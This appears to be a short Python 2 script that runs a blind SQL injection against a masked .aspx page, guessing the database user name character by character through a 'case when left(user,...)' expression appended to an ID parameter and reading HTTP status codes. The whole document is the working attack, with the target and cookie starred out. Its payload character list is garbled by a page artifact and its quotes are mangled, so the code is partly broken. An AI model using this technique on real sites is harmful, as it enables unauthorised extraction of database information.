#encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding(‘utf-8‘) payloads = list(‘[email protected]_.‘) headers = { ‘Cache-Control‘:‘max-age=0‘,‘Accept‘:‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8‘,‘Upgrade-Insecure-Requests‘:‘1‘,‘User-Agent‘:‘Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36‘,‘Accept-Encoding‘:‘gzip, deflate, sdch‘,‘Accept-Language‘:‘zh-CN,zh;q=0.8‘,‘Cookie‘:‘*****************************************‘ } print "test..." user="" for i in range(1,7): for payload in payloads: user+=payload aaa="--" d="(case when (left(user,%s))=‘%s‘ then 1 else 0 end)" % (i,user) test = d + aaa r=requests.get(‘http://**********/******.aspx?ID=203263/‘+test,headers=headers) if r.status_code==200: print user break else: user=user[:-1]
时间: 2024-10-27 11:09:21